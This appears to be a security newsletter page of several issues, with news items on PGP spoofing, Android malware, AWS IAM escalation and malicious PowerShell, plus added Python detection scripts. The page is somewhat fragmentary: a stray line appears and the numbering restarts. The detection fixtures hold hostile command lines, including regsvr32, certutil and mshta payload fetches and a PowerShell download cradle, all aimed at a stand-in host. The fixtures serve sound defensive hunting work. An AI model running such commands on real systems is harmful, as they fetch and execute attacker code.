Inside Security | Inside


David Strom's in-depth cybersecurity news and analysis

I have been following the evolution of digital Estonia for several years and signed up as an e-Resident last year. In this week's podcast for Security Ledger, Paul Roberts interviews Taavi Kotka about his four years as the CIO of Estonia. Kotka talks about his accomplishments, including putting various government services online, such as voting. Two things you can't do digitally in Estonia: get married or divorced. (Denmark has had digital divorces for some time, although it is making them somewhat more difficult next year.) Worth a listen.

-- David Strom, editor of Inside Security

1. Another decades-old flaw has been found in several PGP-related clients. Called SigSpoof, it lets an attacker spoof a digital signature so that verification appears to succeed; it was disclosed last week by a researcher. The flaw is present only when the verbose setting, which is used to troubleshoot bugs or unexpected behavior, is enabled, and none of the vulnerable programs enables verbose by default. – ARS

2. There is new research (the link goes to a screencast demonstration) on a vulnerability in Google Home and Chromecast devices. A Web site can run a simple script in the background that collects precise location data on anyone who has one of these devices anywhere on their local network. The attack works by asking the device, over its local interface, for a list of nearby wireless networks and then submitting that list to Google's geolocation lookup service, which turns a set of nearby access points into a street-level position. Google is working on a fix, after initially declining to act on the researcher's report. – KREBS ON SECURITY



I have put together my top ten recent stories (in order from my most to least favorite) about various tools that defenders can use to protect their networks and endpoints. All of the tools mentioned here are free or minimal cost. Some of these posts are a sequence of articles, so there is a lot to review and learn from here. Don’t worry, there are plenty of exploits to cover and I will do so in tomorrow’s newsletter.

-- David Strom, Editor of Inside Security

1. Here is an excellent series of posts from Varonis on ways to detect hidden malware. The author calls the technique Living off the Land: attackers reuse lesser-known Windows utilities to run script payloads and cloak other activity under the cover of signed Microsoft binaries. It now has three articles. The first is an intro to Regsvr32, which can be pointed at a COM scriptlet (through scrobj.dll) and so made to execute JScript or VBScript. Part 2 covers mshta.exe, the HTML Application host, which began life many years ago as a development tool that let IT people build app-like front ends from HTML plus JavaScript or VBScript; it still sits in Windows\System32 and attackers have been taking advantage of it to run scripts. Part 3 covers Certutil, a utility for managing certificates and displaying CA information that can also be abused to download files and to decode base64-encoded payloads.
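As an added example that is not code from the Varonis series, the following Python hunts process-creation records for the three abuse patterns those posts describe. The log lines are constructed for illustration and their `image=... cmdline="..."` layout is an assumption; real Sysmon event 1 or Security 4688 records need their own field parser, but the rules apply unchanged.

```python
"""Hunt for "living off the land" abuse of regsvr32, mshta and certutil.

Added example for the Varonis series above, not the author's code. The
records in SAMPLE_LOG are constructed; their "image=... cmdline=..." layout
is an assumption and not any product's native event format.
"""
import re
from typing import Dict, List, Optional, Tuple

# basename of the executable -> [(command-line regex, finding label)]
# Each pattern targets the abuse the series describes, so routine use
# (regsvr32 registering a local DLL, certutil dumping a certificate) stays quiet.
RULES: Dict[str, List[Tuple[str, str]]] = {
    "regsvr32.exe": [
        (r"scrobj\.dll", "regsvr32 loading scrobj.dll to execute a COM scriptlet"),
        (r"/i:\s*\S*https?://", "regsvr32 fetching a scriptlet over HTTP via /i:"),
    ],
    "mshta.exe": [
        (r"\b(?:vbscript|javascript):", "mshta running inline script from a URI"),
        (r"https?://", "mshta loading a remote HTA"),
    ],
    "certutil.exe": [
        (r"-urlcache\b.*https?://", "certutil used as a downloader (-urlcache)"),
        (r"-decode\b", "certutil decoding a base64 payload (-decode)"),
    ],
}

RECORD_RE = re.compile(r'image=(?P<image>\S+)\s+cmdline="(?P<cmdline>.*)"\s*$')


def parse_record(line: str) -> Optional[Dict[str, str]]:
    """Pull the image path and command line out of one constructed record."""
    m = RECORD_RE.search(line)
    if not m:
        return None
    image = m.group("image")
    basename = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return {"image": image, "basename": basename, "cmdline": m.group("cmdline")}


def inspect(record: Dict[str, str]) -> List[str]:
    """Return the labels of every rule the record's command line trips."""
    return [
        label
        for pattern, label in RULES.get(record["basename"], [])
        if re.search(pattern, record["cmdline"], re.IGNORECASE)
    ]


def hunt(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Run every record through the rules; unparseable lines are skipped."""
    findings = []
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        for label in inspect(rec):
            findings.append((rec["basename"], label, rec["cmdline"]))
    return findings


# Constructed process-creation records (not real telemetry).
SAMPLE_LOG = [
    r'2018-06-20T10:02:11Z host=ws01 image=C:\Windows\System32\regsvr32.exe cmdline="regsvr32.exe /s C:\Windows\System32\msxml3.dll"',
    r'2018-06-20T10:03:45Z host=ws01 image=C:\Windows\System32\regsvr32.exe cmdline="regsvr32.exe /s /n /u /i:http://example.invalid/a.sct scrobj.dll"',
    r'2018-06-20T10:04:02Z host=ws02 image=C:\Windows\System32\mshta.exe cmdline="mshta.exe vbscript:Close(Execute(MsgBox(1)))"',
    r'2018-06-20T10:05:30Z host=ws02 image=C:\Windows\System32\certutil.exe cmdline="certutil.exe -urlcache -split -f http://example.invalid/p.txt C:\Users\Public\p.txt"',
    r'2018-06-20T10:05:41Z host=ws02 image=C:\Windows\System32\certutil.exe cmdline="certutil.exe -decode C:\Users\Public\p.txt C:\Users\Public\p.exe"',
    r'2018-06-20T10:06:00Z host=ws03 image=C:\Windows\System32\certutil.exe cmdline="certutil.exe -dump C:\Temp\corp-root.cer"',
    r'2018-06-20T10:07:12Z host=ws03 image=C:\Windows\notepad.exe cmdline="notepad.exe C:\Temp\notes.txt"',
]

if __name__ == "__main__":
    for basename, label, cmdline in hunt(SAMPLE_LOG):
        print(f"{basename:14} {label}\n{'':14} {cmdline}")
```

Run as-is it reports five findings from the seven records: both the scriptlet DLL and the remote `/i:` URL on the malicious regsvr32 line, the inline `vbscript:` URI on mshta, and the download and decode steps of certutil, while the benign DLL registration, the certificate dump and notepad stay silent. The point of keying rules on the image basename is that these binaries are legitimate; it is the command line, not the process name, that separates admin use from abuse.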

2. Here is a collection of tools that can be used to understand the internal workings of .NET, such as PerfView and SharpView. While not strictly security tools, they can help you debug your code and find vulnerabilities. – MATT WARREN BLOG

3. Microsoft has patched a major vulnerability in Windows 10 that could let anyone with physical access to a locked PC break in just by issuing voice commands to Cortana from the lock screen. Here are the published technical details of the flaw, along with a step-by-step proof-of-concept video. Before the patch, Cortana could also be used to pull confidential data off the PC. Time to update!

4. Gal Vallerius, a 36-year-old French national, pleaded guilty this week in the U.S. to selling narcotics on the dark web under the nickname OxyMonster. U.S. authorities arrested Vallerius at the Atlanta airport in September after he flew in to compete in the World Beard and Mustache Championships. Investigators identified him by tracing a Bitcoin-based "tip jar" he used, and the contents of his laptop tied him to the crimes. Other dark web criminals use some sort of anonymizing service to hide such trails. Vallerius faces up to 20 years in prison. – BLEEPING COMPUTER

5. In other legal action, a Belgian man was found guilty of a 16-month campaign of harassment against an author known for campaigning against racism. The man's identity was not released, but between January 2015 and April 2016 the author was attacked on Twitter repeatedly by the same account, @Kafirbrigade. Twitter provided law enforcement with the IP address behind the account. My colleague Lisa Vaas tells the story. – NAKED SECURITY (SOPHOS)

6. Here is an informative post that reviews a very subtle AWS privilege escalation method and what you can do to protect yourself against it. It starts with the ability to create a new version of an existing IAM policy and set it as the default, which lets a low-privileged user rewrite the permissions already attached to it. It is not a simple process. Rhino has written an open source program called aws_escalate, which you can download here, that enumerates the IAM users in an account and reports which escalation paths their permissions allow. – RHINO SECURITY BLOG
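As an added example that is not Rhino's code and not aws_escalate, here is a Python check that reads an IAM policy document and reports which escalation-capable IAM actions it grants. The action list is a subset of the IAM actions the write-up discusses; the rule descriptions and the sample policy are constructed here, and the Deny handling is deliberately simplified (Condition blocks and per-resource Deny scoping are ignored, as noted in the code).

```python
"""Report IAM actions in a policy document that allow privilege escalation.

Added example for the Rhino Security Labs write-up above, not Rhino's code
and not aws_escalate. The action list is a subset of the IAM actions that
write-up covers; the descriptions and SAMPLE_POLICY are constructed here.
"""
import fnmatch
from typing import Dict, List, Tuple

# Action -> how a principal holding it can raise its own privileges.
ESCALATION_ACTIONS: Dict[str, str] = {
    "iam:CreatePolicyVersion": "write a new version of an attached managed policy and make it the default",
    "iam:SetDefaultPolicyVersion": "switch an attached managed policy back to a more permissive version",
    "iam:AttachUserPolicy": "attach a managed policy such as AdministratorAccess to one's own user",
    "iam:AttachGroupPolicy": "attach a managed policy to a group the principal belongs to",
    "iam:AttachRolePolicy": "attach a managed policy to a role the principal can assume",
    "iam:PutUserPolicy": "write an inline policy on one's own user",
    "iam:PutGroupPolicy": "write an inline policy on a group the principal belongs to",
    "iam:PutRolePolicy": "write an inline policy on a role the principal can assume",
    "iam:AddUserToGroup": "join a more privileged group",
    "iam:CreateAccessKey": "mint access keys for a more privileged user",
    "iam:CreateLoginProfile": "set a console password for a more privileged user",
    "iam:UpdateLoginProfile": "reset the console password of a more privileged user",
    "iam:UpdateAssumeRolePolicy": "rewrite a privileged role's trust policy so the principal can assume it",
}


def _as_list(value) -> list:
    """IAM lets Statement, Action and Resource be a single value or a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _matches(patterns: List[str], action: str) -> bool:
    """Case-insensitive match of an action against IAM-style wildcards ('iam:*', '*')."""
    return any(fnmatch.fnmatchcase(action.lower(), p.lower()) for p in patterns)


def find_escalation_paths(policy: dict) -> List[Tuple[str, str, str]]:
    """Return (action, resource, description) for each escalation-capable action
    the policy allows and does not explicitly deny.

    Simplifications (assumptions of this example, not IAM semantics): Condition
    blocks are ignored, NotAction/NotResource are not handled, and any Deny on
    an action is treated as blocking it everywhere regardless of its Resource.
    """
    allowed: List[Tuple[str, str]] = []  # (action pattern, resource)
    denied: List[str] = []
    for stmt in _as_list(policy.get("Statement")):
        actions = _as_list(stmt.get("Action"))
        if stmt.get("Effect") == "Allow":
            for resource in _as_list(stmt.get("Resource", "*")):
                allowed.extend((a, resource) for a in actions)
        elif stmt.get("Effect") == "Deny":
            denied.extend(actions)

    findings = []
    for action, why in ESCALATION_ACTIONS.items():
        if _matches(denied, action):
            continue  # an explicit Deny wins over any Allow
        for pattern, resource in allowed:
            if _matches([pattern], action):
                findings.append((action, resource, why))
                break  # report each action once, with the first matching resource
    return findings


# Constructed "developer" policy: looks read-only plus S3, but the one
# CreatePolicyVersion grant on * lets the holder rewrite its own permissions.
SAMPLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["iam:Get*", "iam:List*", "iam:CreatePolicyVersion"],
         "Resource": "*"},
        {"Effect": "Allow", "Action": "s3:*", "Resource": "arn:aws:s3:::dev-bucket/*"},
        {"Effect": "Deny", "Action": "iam:Attach*", "Resource": "*"},
    ],
}

if __name__ == "__main__":
    for action, resource, why in find_escalation_paths(SAMPLE_POLICY):
        print(f"{action} on {resource}: {why}")
```

On the sample policy the only finding is `iam:CreatePolicyVersion` on `*`, which is exactly the case the post opens with: the `iam:Attach*` Deny looks like a guardrail but does nothing to stop a new, more permissive version of an already-attached policy. A real audit should run against the effective permissions of each principal (managed plus inline plus group policies), which is what a tool like aws_escalate enumerates; this block only scores one document.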

7. Two new Android malware families have been discovered. The first is MysteryBot, which packs a banking trojan, a keylogger and ransomware into a single package. It works on Android 7 and 8 devices by using a reliable way to detect when the user brings a targeted app to the foreground and timing its overlay screens to match. ThreatFabric researchers say MysteryBot appears to be related to the well-known and widely used LokiBot trojan. – FOSSBYTES

The second is HeroRat, which uses Telegram's messaging protocol for command and control. It has been spreading since at least August 2017. In March 2018 its source code was released for free on Telegram hacking channels, and hundreds of parallel variants have been circulating in the wild since. Attackers lure victims into installing the RAT by distributing it under various attractive-sounding guises via third-party app stores, social media and messaging apps. – WE LIVE SECURITY (ESET)

8. Joshua Adam Schulte once wrote malware for the CIA and NSA to break into adversaries' computers. He was indicted Monday by the Department of Justice on 13 counts, including allegedly stealing and transmitting thousands of classified documents; prosecutors claim he was the source of the Vault 7 leaks. Schulte had already been charged last year in New York with possession of child pornography. – NYTIMES

9. If you have heard about a Chrome security extension from the startup Paladin, move on. It turns out they are selling snake oil, and the extension is close to worthless. This report explains why, and the devil is in the technical details. – ZDNET

10. Researchers using machine learning have uncovered large-scale abuse of code-signing certificates by BrowseFox, a marketing adware plugin that illicitly injects pop-up ads and discount offers. The plugin can also be exploited by threat actors who corrupt its ads to lead victims to malicious sites and trick them into downloading malware. This post takes you through the details of how it works. – TREND MICRO BLOG

Why not try to figure out a career that can encompass all three at the same time?  -- FACEBOOK

3. Here are some tips on how to improve your web app security from a developer's perspective. Many developers claim that security makes apps harder to use and to test; the author argues that isn't the case, and suggests starting by understanding how much effort is going into stopping an intruder and then drawing an appropriate line in the sand, or in the code, as the case may be. – DZONE

4. Only about half of DevOps teams integrate application security testing into their workflows, according to a new survey. Respondents cited a lack of automated security testing tools, too many false positives to track down, and other excuses. The post discusses how IT can approach secure DevOps and invest in more and better security practices. – SECURITY INTELLIGENCE BLOG (IBM)

5. If you were a fan of the Renesys Internet Intelligence Map, Oracle has purchased its assets and will keep the service going. You can read my 2014 review of the service in Network World here. The map shows ISP outages around the world and where potential trouble spots are developing. It has two sections: Country Statistics and Traffic Shifts. – ORACLE BLOG

6. Here is another series of posts on understanding the malicious PowerShell scripting techniques that attackers commonly use. The first post walked through how to find malicious PowerShell scripts in the Windows event logs and the steps needed to decode them. The second post shows how the Windows Registry is another place where malicious PowerShell scripts can hide. Both are from Mari DeGrazia's Another Forensics blog.
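The decoding step from those posts, as an added Python example that is not DeGrazia's code: it pulls an -EncodedCommand argument out of a log record, decodes the UTF-16LE base64 and keeps unwrapping the `FromBase64String(...)` plus DeflateStream pattern that stagers commonly nest inside it. The event record is constructed inside the block, and the accepted spellings of the EncodedCommand switch are an assumption covering the usual abbreviations rather than PowerShell's full prefix-matching rules.

```python
"""Decode -EncodedCommand PowerShell found in event log records and keep
unwrapping the base64/Deflate stager pattern attackers nest inside it.

Added example for the Another Forensics posts above, not DeGrazia's code.
The event record is constructed by build_sample_event(); the accepted
spellings of the EncodedCommand switch (-e, -ec, -en, -enc, -encodedcommand)
are an assumption covering common abbreviations, not PowerShell's full
prefix-matching rules.
"""
import base64
import re
import zlib
from typing import List

ENC_SWITCH_RE = re.compile(
    r"-(?:e|ec|en|enc|encodedcommand)\s+['\"]?([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
B64_BLOB_RE = re.compile(
    r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.IGNORECASE)


def extract_encoded_commands(log_text: str) -> List[str]:
    """Base64 arguments that follow an EncodedCommand switch anywhere in the text."""
    return ENC_SWITCH_RE.findall(log_text)


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand is base64 over the UTF-16LE bytes of the script."""
    return base64.b64decode(blob).decode("utf-16-le")


def _inflate(data: bytes) -> bytes:
    """Try raw deflate (DeflateStream), gzip (GZipStream) and zlib; else return as-is."""
    for wbits in (-15, 31, 15):
        try:
            return zlib.decompress(data, wbits)
        except zlib.error:
            continue
    return data


def _to_text(data: bytes) -> str:
    """Pick UTF-16LE when the odd bytes are mostly NUL, otherwise UTF-8."""
    if len(data) >= 2 and data[1::2].count(0) > len(data) // 4:
        return data.decode("utf-16-le", errors="replace")
    return data.decode("utf-8", errors="replace")


def unwrap_layers(script: str, max_depth: int = 5) -> List[str]:
    """Return [script, inner, inner-inner, ...] by following FromBase64String() blobs."""
    layers = [script]
    for _ in range(max_depth):
        m = B64_BLOB_RE.search(layers[-1])
        if not m:
            break
        layers.append(_to_text(_inflate(base64.b64decode(m.group(1)))))
    return layers


def analyze(log_text: str) -> List[List[str]]:
    """One list of decoded layers per encoded command found in the text."""
    return [unwrap_layers(decode_encoded_command(b)) for b in extract_encoded_commands(log_text)]


def build_sample_event() -> str:
    """Construct (not captured) a 4688-style record carrying a two-layer payload:
    an -Enc stager that inflates and IEXes a deflated, base64 inner script."""
    inner = "$c = New-Object Net.WebClient; IEX $c.DownloadString('http://example.invalid/s')"
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # raw deflate, as .NET DeflateStream writes
    deflated = comp.compress(inner.encode()) + comp.flush()
    stager = ("IEX (New-Object IO.StreamReader((New-Object IO.Compression.DeflateStream("
              "[IO.MemoryStream][Convert]::FromBase64String('{}'),"
              "[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()"
              ).format(base64.b64encode(deflated).decode())
    enc = base64.b64encode(stager.encode("utf-16-le")).decode()
    return ("Event 4688, New Process Name: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe, "
            "Process Command Line: powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc " + enc)


if __name__ == "__main__":
    for layers in analyze(build_sample_event()):
        for depth, text in enumerate(layers):
            print(f"--- layer {depth} ---\n{text}")
```

Running it prints the stager as layer 0 and the download cradle as layer 1. Two details matter in practice: the first decode must use UTF-16LE (a UTF-8 decode of the same bytes yields interleaved NULs), and the inner blob is usually raw deflate with no zlib header, which is why `_inflate` tries negative window bits first. Any `-Enc` argument that does not decode to readable script under these rules is worth a manual look rather than being dismissed.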

7. Bro is an extremely powerful network traffic analyzer: it records network metadata and provides a scripting language for describing the behavioral signs of interest you want it to flag. It is open source, too. This blog post describes its many uses, and you can download the code here. It was originally developed by Vern Paxson, and academic researchers at Berkeley and Urbana-Champaign contribute to its code.
